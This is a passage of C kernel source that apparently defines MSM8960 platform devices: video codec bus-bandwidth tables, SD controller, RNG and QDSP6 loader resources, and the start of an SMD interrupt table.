/* VGA decode */
static struct msm_bus_vectors vidc_vdec_vga_vectors[] = {
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 40894464,
		.ib = 327155712,
	},
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 48234496,
		.ib = 192937984,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 2000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 2000000,
	},
};

/* 720p encode */
static struct msm_bus_vectors vidc_venc_720p_vectors[] = {
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 163577856,
		.ib = 1308622848,
	},
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 219152384,
		.ib = 876609536,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 3500000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 3500000,
	},
};

/* 720p decode */
static struct msm_bus_vectors vidc_vdec_720p_vectors[] = {
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 121634816,
		.ib = 973078528,
	},
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 155189248,
		.ib = 620756992,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 7000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 7000000,
	},
};

/* 1080p encode */
static struct msm_bus_vectors vidc_venc_1080p_vectors[] = {
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 372244480,
		.ib = 2560000000U,
	},
	{
		.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 501219328,
		.ib = 2560000000U,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 5000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 5000000,
	},
};
static struct msm_bus_vectors vidc_vdec_1080p_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 2560000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_vectors vidc_venc_1080p_turbo_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_vectors vidc_vdec_1080p_turbo_vectors[] = {
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 222298112,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_HD_CODEC_PORT1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 330301440,
.ib = 3522000000U,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 700000000,
},
{
.src = MSM_BUS_MASTER_AMPSS_M0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 2500000,
.ib = 10000000,
},
};
static struct msm_bus_paths vidc_bus_client_config[] = {
{
ARRAY_SIZE(vidc_init_vectors),
vidc_init_vectors,
},
{
ARRAY_SIZE(vidc_venc_vga_vectors),
vidc_venc_vga_vectors,
},
{
ARRAY_SIZE(vidc_vdec_vga_vectors),
vidc_vdec_vga_vectors,
},
{
ARRAY_SIZE(vidc_venc_720p_vectors),
vidc_venc_720p_vectors,
},
{
ARRAY_SIZE(vidc_vdec_720p_vectors),
vidc_vdec_720p_vectors,
},
{
ARRAY_SIZE(vidc_venc_1080p_vectors),
vidc_venc_1080p_vectors,
},
{
ARRAY_SIZE(vidc_vdec_1080p_vectors),
vidc_vdec_1080p_vectors,
},
{
ARRAY_SIZE(vidc_venc_1080p_turbo_vectors),
vidc_venc_1080p_turbo_vectors,
},
{
ARRAY_SIZE(vidc_vdec_1080p_turbo_vectors),
vidc_vdec_1080p_turbo_vectors,
},
};
static struct msm_bus_scale_pdata vidc_bus_client_data = {
vidc_bus_client_config,
ARRAY_SIZE(vidc_bus_client_config),
.name = "vidc",
};
/*
 * Bus-scaling vectors for the "Pro" video core variant.  Same bandwidth
 * figures as the tables above, but the codec masters are the dedicated
 * VIDEO_ENC/VIDEO_DEC ports instead of HD_CODEC_PORT0/1.
 */
static struct msm_bus_vectors vidc_pro_init_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 0,
		.ib = 0,
	},
};

/* VGA encode. */
static struct msm_bus_vectors vidc_pro_venc_vga_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 54525952,
		.ib = 436207616,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 72351744,
		.ib = 289406976,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 1000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 1000000,
	},
};

/* VGA decode. */
static struct msm_bus_vectors vidc_pro_vdec_vga_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 40894464,
		.ib = 327155712,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 48234496,
		.ib = 192937984,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 2000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 500000,
		.ib = 2000000,
	},
};

/* 720p encode. */
static struct msm_bus_vectors vidc_pro_venc_720p_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 163577856,
		.ib = 1308622848,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 219152384,
		.ib = 876609536,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 3500000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 3500000,
	},
};

/* 720p decode. */
static struct msm_bus_vectors vidc_pro_vdec_720p_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 121634816,
		.ib = 973078528,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 155189248,
		.ib = 620756992,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 7000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 1750000,
		.ib = 7000000,
	},
};

/* 1080p encode. */
static struct msm_bus_vectors vidc_pro_venc_1080p_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 372244480,
		.ib = 2560000000U,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 501219328,
		.ib = 2560000000U,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 5000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 5000000,
	},
};

/* 1080p decode. */
static struct msm_bus_vectors vidc_pro_vdec_1080p_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 222298112,
		.ib = 2560000000U,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 330301440,
		.ib = 2560000000U,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 700000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 10000000,
	},
};

/* 1080p encode, turbo mode. */
static struct msm_bus_vectors vidc_pro_venc_1080p_turbo_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 222298112,
		.ib = 3522000000U,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 330301440,
		.ib = 3522000000U,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 700000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 10000000,
	},
};

/* 1080p decode, turbo mode (same figures as turbo encode). */
static struct msm_bus_vectors vidc_pro_vdec_1080p_turbo_vectors[] = {
	{
		.src = MSM_BUS_MASTER_VIDEO_ENC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 222298112,
		.ib = 3522000000U,
	},
	{
		.src = MSM_BUS_MASTER_VIDEO_DEC,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 330301440,
		.ib = 3522000000U,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 700000000,
	},
	{
		.src = MSM_BUS_MASTER_AMPSS_M0,
		.dst = MSM_BUS_SLAVE_EBI_CH0,
		.ab = 2500000,
		.ib = 10000000,
	},
};
/*
 * Usecase table for the Pro video core; entry order mirrors
 * vidc_bus_client_config (init, venc/vdec VGA, 720p, 1080p, 1080p turbo).
 */
static struct msm_bus_paths vidc_pro_bus_client_config[] = {
	{
		ARRAY_SIZE(vidc_pro_init_vectors),
		vidc_pro_init_vectors,
	},
	{
		ARRAY_SIZE(vidc_pro_venc_vga_vectors),
		vidc_pro_venc_vga_vectors,
	},
	{
		ARRAY_SIZE(vidc_pro_vdec_vga_vectors),
		vidc_pro_vdec_vga_vectors,
	},
	{
		ARRAY_SIZE(vidc_pro_venc_720p_vectors),
		vidc_pro_venc_720p_vectors,
	},
	{
		ARRAY_SIZE(vidc_pro_vdec_720p_vectors),
		vidc_pro_vdec_720p_vectors,
	},
	{
		ARRAY_SIZE(vidc_pro_venc_1080p_vectors),
		vidc_pro_venc_1080p_vectors,
	},
	{
		ARRAY_SIZE(vidc_pro_vdec_1080p_vectors),
		vidc_pro_vdec_1080p_vectors,
	},
	{
		ARRAY_SIZE(vidc_pro_venc_1080p_turbo_vectors),
		vidc_pro_venc_1080p_turbo_vectors,
	},
	{
		/* Fixed: previously sized with ARRAY_SIZE of the non-Pro
		 * vidc_vdec_1080p_turbo_vectors table; harmless today (both
		 * have 4 entries) but wrong if the tables ever diverge. */
		ARRAY_SIZE(vidc_pro_vdec_1080p_turbo_vectors),
		vidc_pro_vdec_1080p_turbo_vectors,
	},
};
/* Bus-scaling client registration data for the Pro video core. */
static struct msm_bus_scale_pdata vidc_pro_bus_client_data = {
	vidc_pro_bus_client_config,
	/* Fixed: previously counted the non-Pro vidc_bus_client_config
	 * table; harmless today (both hold 9 usecases) but a latent bug
	 * if the two tables ever diverge. */
	ARRAY_SIZE(vidc_pro_bus_client_config),
	.name = "vidc",
};
#endif
#ifdef CONFIG_HW_RANDOM_MSM
/* PRNG device */
#define MSM_PRNG_PHYS		0x1A500000
/* 512-byte hardware RNG register window. */
static struct resource rng_resources = {
	.flags = IORESOURCE_MEM,
	.start = MSM_PRNG_PHYS,
	.end   = MSM_PRNG_PHYS + SZ_512 - 1,
};

struct platform_device msm_device_rng = {
	.name          = "msm_rng",
	.id            = 0,
	.num_resources = 1,
	.resource      = &rng_resources,
};
#endif
/* Video codec core: 1 MiB register window plus its interrupt. */
#define MSM_VIDC_BASE_PHYS 0x04400000
#define MSM_VIDC_BASE_SIZE 0x00100000

static struct resource msm_device_vidc_resources[] = {
	{
		.start	= MSM_VIDC_BASE_PHYS,
		.end	= MSM_VIDC_BASE_PHYS + MSM_VIDC_BASE_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.start	= VCODEC_IRQ,
		.end	= VCODEC_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

/* Memory-type selection depends on ION support; bus scaling uses the
 * non-Pro client table by default. */
struct msm_vidc_platform_data vidc_platform_data = {
#ifdef CONFIG_MSM_BUS_SCALING
	.vidc_bus_client_pdata = &vidc_bus_client_data,
#endif
#ifdef CONFIG_MSM_MULTIMEDIA_USE_ION
	.memtype = ION_CP_MM_HEAP_ID,
	.enable_ion = 1,
	.cp_enabled = 1,
#else
	.memtype = MEMTYPE_EBI1,
	.enable_ion = 0,
#endif
	.disable_dmx = 0,
	.disable_fullhd = 0,
	.cont_mode_dpb_count = 18,
	/* Presumably the fixed physical load address for the vidc
	 * firmware image — TODO confirm against the memory map. */
	.fw_addr = 0x9fe00000,
	.enable_sec_metadata = 0,
};

struct platform_device msm_device_vidc = {
	.name = "msm_vidc",
	.id = 0,
	.num_resources = ARRAY_SIZE(msm_device_vidc_resources),
	.resource = msm_device_vidc_resources,
	.dev = {
		.platform_data = &vidc_platform_data,
	},
};
/* SDCC register layout: each controller has its core registers at BASE,
 * the DML block at BASE+0x800 and the BAM block at BASE+0x2000. */
#define MSM_SDC1_BASE                 0x12400000
#define MSM_SDC1_DML_BASE             (MSM_SDC1_BASE + 0x800)
#define MSM_SDC1_BAM_BASE             (MSM_SDC1_BASE + 0x2000)
#define MSM_SDC2_BASE                 0x12140000
#define MSM_SDC2_DML_BASE             (MSM_SDC2_BASE + 0x800)
#define MSM_SDC2_BAM_BASE             (MSM_SDC2_BASE + 0x2000)
#define MSM_SDC3_BASE                 0x12180000
#define MSM_SDC3_DML_BASE             (MSM_SDC3_BASE + 0x800)
#define MSM_SDC3_BAM_BASE             (MSM_SDC3_BASE + 0x2000)
#define MSM_SDC4_BASE                 0x121C0000
#define MSM_SDC4_DML_BASE             (MSM_SDC4_BASE + 0x800)
#define MSM_SDC4_BAM_BASE             (MSM_SDC4_BASE + 0x2000)
#define MSM_SDC5_BASE                 0x12200000
#define MSM_SDC5_DML_BASE             (MSM_SDC5_BASE + 0x800)
#define MSM_SDC5_BAM_BASE             (MSM_SDC5_BASE + 0x2000)
/* Resources for SDCC1..5.  Each has the core register window and IRQ;
 * the DML/BAM windows and BAM IRQ are only present when SPS (BAM DMA)
 * support is compiled in. */
static struct resource resources_sdc1[] = {
	{
		.name	= "core_mem",
		.flags	= IORESOURCE_MEM,
		.start	= MSM_SDC1_BASE,
		.end	= MSM_SDC1_DML_BASE - 1,
	},
	{
		.name	= "core_irq",
		.flags	= IORESOURCE_IRQ,
		.start	= SDC1_IRQ_0,
		.end	= SDC1_IRQ_0
	},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
	{
		.name	= "dml_mem",
		.start	= MSM_SDC1_DML_BASE,
		.end	= MSM_SDC1_BAM_BASE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_mem",
		.start	= MSM_SDC1_BAM_BASE,
		.end	= MSM_SDC1_BAM_BASE + (2 * SZ_4K) - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_irq",
		.start	= SDC1_BAM_IRQ,
		.end	= SDC1_BAM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
#endif
};

static struct resource resources_sdc2[] = {
	{
		.name	= "core_mem",
		.flags	= IORESOURCE_MEM,
		.start	= MSM_SDC2_BASE,
		.end	= MSM_SDC2_DML_BASE - 1,
	},
	{
		.name	= "core_irq",
		.flags	= IORESOURCE_IRQ,
		.start	= SDC2_IRQ_0,
		.end	= SDC2_IRQ_0
	},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
	{
		.name	= "dml_mem",
		.start	= MSM_SDC2_DML_BASE,
		.end	= MSM_SDC2_BAM_BASE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_mem",
		.start	= MSM_SDC2_BAM_BASE,
		.end	= MSM_SDC2_BAM_BASE + (2 * SZ_4K) - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_irq",
		.start	= SDC2_BAM_IRQ,
		.end	= SDC2_BAM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
#endif
};

static struct resource resources_sdc3[] = {
	{
		.name	= "core_mem",
		.flags	= IORESOURCE_MEM,
		.start	= MSM_SDC3_BASE,
		.end	= MSM_SDC3_DML_BASE - 1,
	},
	{
		.name	= "core_irq",
		.flags	= IORESOURCE_IRQ,
		.start	= SDC3_IRQ_0,
		.end	= SDC3_IRQ_0
	},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
	{
		.name	= "dml_mem",
		.start	= MSM_SDC3_DML_BASE,
		.end	= MSM_SDC3_BAM_BASE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_mem",
		.start	= MSM_SDC3_BAM_BASE,
		.end	= MSM_SDC3_BAM_BASE + (2 * SZ_4K) - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_irq",
		.start	= SDC3_BAM_IRQ,
		.end	= SDC3_BAM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
#endif
};

static struct resource resources_sdc4[] = {
	{
		.name	= "core_mem",
		.flags	= IORESOURCE_MEM,
		.start	= MSM_SDC4_BASE,
		.end	= MSM_SDC4_DML_BASE - 1,
	},
	{
		.name	= "core_irq",
		.flags	= IORESOURCE_IRQ,
		.start	= SDC4_IRQ_0,
		.end	= SDC4_IRQ_0
	},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
	{
		.name	= "dml_mem",
		.start	= MSM_SDC4_DML_BASE,
		.end	= MSM_SDC4_BAM_BASE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_mem",
		.start	= MSM_SDC4_BAM_BASE,
		.end	= MSM_SDC4_BAM_BASE + (2 * SZ_4K) - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_irq",
		.start	= SDC4_BAM_IRQ,
		.end	= SDC4_BAM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
#endif
};

static struct resource resources_sdc5[] = {
	{
		.name	= "core_mem",
		.flags	= IORESOURCE_MEM,
		.start	= MSM_SDC5_BASE,
		.end	= MSM_SDC5_DML_BASE - 1,
	},
	{
		.name	= "core_irq",
		.flags	= IORESOURCE_IRQ,
		.start	= SDC5_IRQ_0,
		.end	= SDC5_IRQ_0
	},
#ifdef CONFIG_MMC_MSM_SPS_SUPPORT
	{
		.name	= "dml_mem",
		.start	= MSM_SDC5_DML_BASE,
		.end	= MSM_SDC5_BAM_BASE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_mem",
		.start	= MSM_SDC5_BAM_BASE,
		.end	= MSM_SDC5_BAM_BASE + (2 * SZ_4K) - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "bam_irq",
		.start	= SDC5_BAM_IRQ,
		.end	= SDC5_BAM_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
#endif
};
/* SDCC controller devices; ids are the 1-based controller numbers used
 * by msm_add_sdcc().  32-bit coherent DMA mask on all of them. */
struct platform_device msm_device_sdc1 = {
	.name		= "msm_sdcc",
	.id		= 1,
	.num_resources	= ARRAY_SIZE(resources_sdc1),
	.resource	= resources_sdc1,
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};

struct platform_device msm_device_sdc2 = {
	.name		= "msm_sdcc",
	.id		= 2,
	.num_resources	= ARRAY_SIZE(resources_sdc2),
	.resource	= resources_sdc2,
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};

struct platform_device msm_device_sdc3 = {
	.name		= "msm_sdcc",
	.id		= 3,
	.num_resources	= ARRAY_SIZE(resources_sdc3),
	.resource	= resources_sdc3,
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};

struct platform_device msm_device_sdc4 = {
	.name		= "msm_sdcc",
	.id		= 4,
	.num_resources	= ARRAY_SIZE(resources_sdc4),
	.resource	= resources_sdc4,
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};

struct platform_device msm_device_sdc5 = {
	.name		= "msm_sdcc",
	.id		= 5,
	.num_resources	= ARRAY_SIZE(resources_sdc5),
	.resource	= resources_sdc5,
	.dev		= {
		.coherent_dma_mask	= 0xffffffff,
	},
};
/* LPASS (audio) QDSP6 peripheral-image-loader device. */
#define MSM_LPASS_QDSP6SS_PHYS	0x28800000
#define SFAB_LPASS_Q6_ACLK_CTL	(MSM_CLK_CTL_BASE + 0x23A0)

static struct resource msm_8960_q6_lpass_resources[] = {
	{
		.start  = MSM_LPASS_QDSP6SS_PHYS,
		.end    = MSM_LPASS_QDSP6SS_PHYS + SZ_256 - 1,
		.flags  = IORESOURCE_MEM,
	},
};

/* Boot strap addresses and clock register for the LPASS Q6; pas_id
 * selects the secure-PIL image. */
static struct pil_q6v4_pdata msm_8960_q6_lpass_data = {
	.strap_tcm_base  = 0x01460000,
	.strap_ahb_upper = 0x00290000,
	.strap_ahb_lower = 0x00000280,
	.aclk_reg = SFAB_LPASS_Q6_ACLK_CTL,
	.name = "q6",
	.pas_id = PAS_Q6,
	.bus_port = MSM_BUS_MASTER_LPASS_PROC,
};

struct platform_device msm_8960_q6_lpass = {
	.name = "pil_qdsp6v4",
	.id = 0,
	.num_resources  = ARRAY_SIZE(msm_8960_q6_lpass_resources),
	.resource       = msm_8960_q6_lpass_resources,
	.dev.platform_data = &msm_8960_q6_lpass_data,
};
/* Modem firmware QDSP6 PIL device; depends on the LPASS "q6" image. */
#define MSM_MSS_ENABLE_PHYS	0x08B00000
#define MSM_FW_QDSP6SS_PHYS	0x08800000
#define MSS_Q6FW_JTAG_CLK_CTL	(MSM_CLK_CTL_BASE + 0x2C6C)
#define SFAB_MSS_Q6_FW_ACLK_CTL (MSM_CLK_CTL_BASE + 0x2044)

static struct resource msm_8960_q6_mss_fw_resources[] = {
	{
		.start  = MSM_FW_QDSP6SS_PHYS,
		.end    = MSM_FW_QDSP6SS_PHYS + SZ_256 - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		/* Single 32-bit MSS enable register, shared with the SW image. */
		.start  = MSM_MSS_ENABLE_PHYS,
		.end    = MSM_MSS_ENABLE_PHYS + 4 - 1,
		.flags  = IORESOURCE_MEM,
	},
};

static struct pil_q6v4_pdata msm_8960_q6_mss_fw_data = {
	.strap_tcm_base  = 0x00400000,
	.strap_ahb_upper = 0x00090000,
	.strap_ahb_lower = 0x00000080,
	.aclk_reg = SFAB_MSS_Q6_FW_ACLK_CTL,
	.jtag_clk_reg = MSS_Q6FW_JTAG_CLK_CTL,
	.name = "modem_fw",
	.depends = "q6",
	.pas_id = PAS_MODEM_FW,
	.bus_port = MSM_BUS_MASTER_MSS_FW_PROC,
};

struct platform_device msm_8960_q6_mss_fw = {
	.name = "pil_qdsp6v4",
	.id = 1,
	.num_resources  = ARRAY_SIZE(msm_8960_q6_mss_fw_resources),
	.resource       = msm_8960_q6_mss_fw_resources,
	.dev.platform_data = &msm_8960_q6_mss_fw_data,
};
/* Modem software QDSP6 PIL device; depends on "modem_fw". */
#define MSM_SW_QDSP6SS_PHYS	0x08900000
#define SFAB_MSS_Q6_SW_ACLK_CTL	(MSM_CLK_CTL_BASE + 0x2040)
#define MSS_Q6SW_JTAG_CLK_CTL	(MSM_CLK_CTL_BASE + 0x2C68)

static struct resource msm_8960_q6_mss_sw_resources[] = {
	{
		.start  = MSM_SW_QDSP6SS_PHYS,
		.end    = MSM_SW_QDSP6SS_PHYS + SZ_256 - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		/* Same MSS enable register as the FW image. */
		.start  = MSM_MSS_ENABLE_PHYS,
		.end    = MSM_MSS_ENABLE_PHYS + 4 - 1,
		.flags  = IORESOURCE_MEM,
	},
};

static struct pil_q6v4_pdata msm_8960_q6_mss_sw_data = {
	.strap_tcm_base  = 0x00420000,
	.strap_ahb_upper = 0x00090000,
	.strap_ahb_lower = 0x00000080,
	.aclk_reg = SFAB_MSS_Q6_SW_ACLK_CTL,
	.jtag_clk_reg = MSS_Q6SW_JTAG_CLK_CTL,
	.name = "modem",
	.depends = "modem_fw",
	.pas_id = PAS_MODEM_SW,
	.bus_port = MSM_BUS_MASTER_MSS_SW_PROC,
};

struct platform_device msm_8960_q6_mss_sw = {
	.name = "pil_qdsp6v4",
	.id = 2,
	.num_resources  = ARRAY_SIZE(msm_8960_q6_mss_sw_resources),
	.resource       = msm_8960_q6_mss_sw_resources,
	.dev.platform_data = &msm_8960_q6_mss_sw_data,
};
/* Riva (WCNSS) PIL device: a single 256-byte register window. */
static struct resource msm_8960_riva_resources[] = {
	{
		.start  = 0x03204000,
		.end    = 0x03204000 + SZ_256 - 1,
		.flags  = IORESOURCE_MEM,
	},
};

struct platform_device msm_8960_riva = {
	.name = "pil_riva",
	.id = -1,
	.num_resources  = ARRAY_SIZE(msm_8960_riva_resources),
	.resource       = msm_8960_riva_resources,
};

struct platform_device msm_pil_tzapps = {
	.name = "pil_tzapps",
	.id = -1,
};

struct platform_device msm_pil_dsps = {
	.name          = "pil_dsps",
	.id            = -1,
	/* platform_data is the subsystem name string, not a struct. */
	.dev.platform_data = "dsps",
};

struct platform_device msm_pil_vidc = {
	.name = "pil_vidc",
	.id = -1,
};
/* Incoming SMD/SMSM interrupts from each remote subsystem, looked up by
 * name from the per-edge configs below. */
static struct resource smd_resource[] = {
	{
		.name   = "a9_m2a_0",
		.start  = INT_A9_M2A_0,
		.flags  = IORESOURCE_IRQ,
	},
	{
		.name   = "a9_m2a_5",
		.start  = INT_A9_M2A_5,
		.flags  = IORESOURCE_IRQ,
	},
	{
		.name   = "adsp_a11",
		.start  = INT_ADSP_A11,
		.flags  = IORESOURCE_IRQ,
	},
	{
		.name   = "adsp_a11_smsm",
		.start  = INT_ADSP_A11_SMSM,
		.flags  = IORESOURCE_IRQ,
	},
	{
